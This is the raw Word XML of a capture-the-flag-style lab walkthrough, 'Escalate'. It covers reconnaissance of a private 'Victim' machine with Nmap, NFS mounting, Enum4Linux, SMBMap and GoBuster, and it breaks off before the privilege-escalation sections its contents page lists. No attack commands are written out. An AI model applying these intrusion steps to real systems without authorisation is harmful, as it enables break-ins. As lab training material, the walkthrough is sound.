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6C6A" w14:textId="7684758A" w:rsidR="00C173B3" w:rsidRDefault="00B23458" w:rsidP="0096682F">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough – Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A75B0" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1087810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2ED94801" w14:textId="74D258DE" w:rsidR="0096682F" w:rsidRDefault="0096682F">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="18D8E374" w14:textId="51F145E9" w:rsidR="00B8061F" w:rsidRDefault="0096682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06699" w:history="1">
            <w:r w:rsidR="00B8061F" w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host Discovery</w:t>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148006699 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B8061F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="539A86C5" w14:textId="7523477C" w:rsidR="00B8061F" w:rsidRDefault="00B806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006700" w:history="1">
            <w:r w:rsidRPr="00DB01DB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2528" w14:textId="404D4B54" w:rsidR="00B8061F" w:rsidRDefault="00B806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006701" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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5774" w14:textId="5701EA4B" w:rsidR="00B8061F" w:rsidRDefault="00B806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006702" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enum4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FAE0" w14:textId="42B2E009" w:rsidR="00B8061F" w:rsidRDefault="00B806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006703" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SMB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0F0F" w14:textId="42F6E29E" w:rsidR="00B8061F" w:rsidRDefault="00B806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006704" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GoB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8851" w14:textId="3B9C6D8F" w:rsidR="00B8061F" w:rsidRDefault="00B806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006705" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command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826A" w14:textId="232EBA67" w:rsidR="00B8061F" w:rsidRDefault="00B806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006706" w:history="1">
            <w:r w:rsidRPr="00DB01DB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E112" w14:textId="31C318C5" w:rsidR="00B8061F" w:rsidRDefault="00B806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006707" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Upgrad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2ABB" w14:textId="58BCB7DF" w:rsidR="00B8061F" w:rsidRDefault="00B806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006708" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding SUID Bi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34CF" w14:textId="52B8D7B6" w:rsidR="00B8061F" w:rsidRDefault="00B806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006709" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User 3 Exploit – Binary with S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99C1" w14:textId="2CCF2C8F" w:rsidR="00B8061F" w:rsidRDefault="00B806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006710" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User 3 Exploit – Writable Script called when executing SUID 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4F90" w14:textId="442380FB" w:rsidR="00B8061F" w:rsidRDefault="00B806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006711" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CronJob 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27F8" w14:textId="68CD0B48" w:rsidR="00B8061F" w:rsidRDefault="00B806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006712" w:history="1">
            <w:r w:rsidRPr="00DB01DB">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploiting binarie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07AF" w14:textId="4F213B12" w:rsidR="0096682F" w:rsidRDefault="0096682F">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1B726EFC" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="152F4470" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="1C64202F" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="7A766293" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="5476D197" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="353C3823" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="282FDCEB" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2122BF8E" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="3152B6B0" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="5DD08EBE" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2F7C31C0" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="2D9479A7" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="4098611D" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="114FE6D9" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="0C6C4E12" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="224BCCE9" w14:textId="5E678C4A" w:rsidR="00B23458" w:rsidRDefault="0096682F" w:rsidP="0096682F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc148006699"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="09A47E88" w14:textId="6B553DEA" w:rsidR="0096682F" w:rsidRDefault="0096682F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D147537" wp14:editId="403527EE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5731510" cy="165100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19938"/>
                <wp:lineTo x="21538" y="19938"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="133923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360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7D7B9" wp14:editId="32D1196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180952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56" y="19505"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="192948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864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3C7B3" w14:textId="52673EE2" w:rsidR="00B23458" w:rsidRDefault="00F33142">
      <w:r w:rsidRPr="00EF1C42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA7268" w14:textId="366B325E" w:rsidR="00F33142" w:rsidRDefault="00F33142">
      <w:r w:rsidRPr="00EF1C42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C29A52" w14:textId="68FEA2D1" w:rsidR="00B23458" w:rsidRDefault="00AE6A24" w:rsidP="002F5C07">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc148006700"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="39EC4EC6" w14:textId="4087E95D" w:rsidR="00AE6A24" w:rsidRDefault="00542820">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7353EE89" wp14:editId="2C442119">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>196215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3213100" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21304"/>
                <wp:lineTo x="21515" y="21304"/>
                <wp:lineTo x="21515" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="84994859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48599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008">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="232CE9A8" wp14:editId="25E74C4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190476" cy="171429"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19271"/>
                <wp:lineTo x="21407" y="19271"/>
                <wp:lineTo x="21407" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="144379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969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232A8" w14:textId="25797B9C" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="19AE7C22" w14:textId="55C49A02" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="18CB9E17" w14:textId="1E185B12" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="03C813A6" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="66C9BBF0" w14:textId="17D2E7B5" w:rsidR="00B23458" w:rsidRDefault="00FA4D1F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AE54D4F" wp14:editId="110FC37A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>859790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21098"/>
                <wp:lineTo x="21538" y="21098"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8529339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3397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C0098B5" wp14:editId="02C00EBC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5731510" cy="234315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19317"/>
                <wp:lineTo x="21538" y="19317"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="151561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15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1928B42" wp14:editId="25EAB4CF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5731510" cy="193675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19121"/>
                <wp:lineTo x="21538" y="19121"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="75059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996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BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42DB6303" wp14:editId="12D99ED5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731510" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18000"/>
                <wp:lineTo x="21538" y="18000"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="21635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59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6D21D" w14:textId="22767DF2" w:rsidR="00B23458" w:rsidRDefault="00924BB2" w:rsidP="00924BB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc148006701"/>
      <w:r>
        <w:t>NFS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0E9E39F5" w14:textId="018B9359" w:rsidR="00924BB2" w:rsidRDefault="00924BB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62A0638B" wp14:editId="3CCCDD3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219048" cy="628571"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20967"/>
                <wp:lineTo x="21476" y="20967"/>
                <wp:lineTo x="21476" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1041529841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29841" name="Picture 1" descr="A close up of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948E1" w14:textId="41E4FFEA" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="45ADDE87" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="131007BA" w14:textId="38223DE3" w:rsidR="00B23458" w:rsidRDefault="00144DA1">
      <w:r>
        <w:t xml:space="preserve">Now that there is a drive available for </w:t>
      </w:r>
      <w:r w:rsidR="0028438A">
        <w:t>mounting,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I can mount it.</w:t>
      </w:r>
      <w:r w:rsidR="002148C2">
        <w:t xml:space="preserve"> I will first create a directory to mount with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CFFA8" w14:textId="7BAA67B8" w:rsidR="002148C2" w:rsidRDefault="002148C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08FF0624" wp14:editId="3E90A2D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09524" cy="228571"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19855"/>
                <wp:lineTo x="21300" y="19855"/>
                <wp:lineTo x="21300" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="100861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12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708B1" w14:textId="44DC38FA" w:rsidR="00B23458" w:rsidRDefault="00BC4BE5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FCCD27B" wp14:editId="4F829B9F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5609524" cy="238095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19059"/>
                <wp:lineTo x="21495" y="19059"/>
                <wp:lineTo x="21495" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="557717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173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E98">
        <w:t>Now I will mount.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8EA89" w14:textId="6E8A25E2" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="22F02D7C" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="6F6D0728" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="74105F7E" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="480849B4" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="066DB3CA" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="70725D22" w14:textId="18F1BAB7" w:rsidR="00B23458" w:rsidRDefault="0028438A" w:rsidP="001F2752">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc148006702"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enum4Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="41983D5D" w14:textId="0E0059B9" w:rsidR="0028438A" w:rsidRDefault="00FA0550">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F980BCB" wp14:editId="1F092ABA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330200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434" y="21280"/>
                <wp:lineTo x="21434" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="144721825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18259" name="Picture 1" descr="A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576" cy="12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38A">
        <w:t>I will use this in the attempt to find any usernames or accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002AA07D" w14:textId="033171CB" w:rsidR="001F2752" w:rsidRDefault="001F2752"/>
    <w:p w14:paraId="380CE08C" w14:textId="77777777" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="201200F1" w14:textId="673C43C2" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="3610E743" w14:textId="2522992C" w:rsidR="00B23458" w:rsidRDefault="00CF2A7D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12BCCC1B" wp14:editId="1AF015F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-25400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>304165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5685714" cy="952381"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21182"/>
                <wp:lineTo x="21496" y="21182"/>
                <wp:lineTo x="21496" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="99178566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85662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4E11C" w14:textId="618F0DAC" w:rsidR="00B23458" w:rsidRDefault="00CF2A7D">
      <w:r>
        <w:t>A share was also found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F447A" w14:textId="2D960F07" w:rsidR="00B23458" w:rsidRDefault="00C3254D" w:rsidP="00C3254D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc148006703"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBMap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43873DE7" w14:textId="06E0540A" w:rsidR="00C3254D" w:rsidRDefault="0096710E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16B705AE" wp14:editId="6704C379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731510" cy="484505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20383"/>
                <wp:lineTo x="21538" y="20383"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="121097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757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54D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="559A5C77" wp14:editId="0501D01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704762" cy="266667"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20105"/>
                <wp:lineTo x="21437" y="20105"/>
                <wp:lineTo x="21437" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="20909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1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A449B" w14:textId="5BFF77A3" w:rsidR="00B23458" w:rsidRDefault="0096710E">
      <w:r>
        <w:t>Anonymous access is not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFB042" w14:textId="00B6FBA3" w:rsidR="00B23458" w:rsidRDefault="00B23458"/>
    <w:p w14:paraId="43D8E926" w14:textId="04915005" w:rsidR="00B23458" w:rsidRDefault="00E17E49" w:rsidP="00790026">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc148006704"/>
      <w:r>
        <w:t>GoBuster</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7D375A46" w14:textId="3A46AAEC" w:rsidR="00E17E49" w:rsidRDefault="00E17E49">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I tried </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and nothing really showed up. So now I tried </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobsuter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to find any files or directories.</w:t>
      </w:r>
      <w:r w:rsidR="00394A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00394A22">
        <w:t>Yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00394A22">
        <w:t xml:space="preserve"> I could have found files using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00394A22">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00394A22">
        <w:t xml:space="preserve"> but the way I use the tools are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FF91F" w14:textId="3138CDA1" w:rsidR="00394A22" w:rsidRDefault="00394A22" w:rsidP="00394A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – common.txt (directory search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B401E93" w14:textId="74654801" w:rsidR="00394A22" w:rsidRDefault="00394A22" w:rsidP="00394A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00394A22">
        <w:t>directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00394A22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(directory search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EC418" w14:textId="0A2706F9" w:rsidR="00394A22" w:rsidRDefault="00204F86" w:rsidP="00394A22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7CFCDE" wp14:editId="164325B9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31510" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19505"/>
                <wp:lineTo x="21538" y="19505"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="66070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097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A22">
        <w:t>Gobuster –</w:t>
      </w:r>
      <w:r w:rsidR="00394A22" w:rsidRPr="00394A22">
        <w:t>directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r w:rsidR="00394A22">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A56E47">
        <w:t xml:space="preserve">directory &amp; </w:t>
      </w:r>
      <w:r w:rsidR="00394A22">
        <w:t>File search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9BD5D" w14:textId="132B7CC4" w:rsidR="00B23458" w:rsidRDefault="00E85D60">
      <w:r>
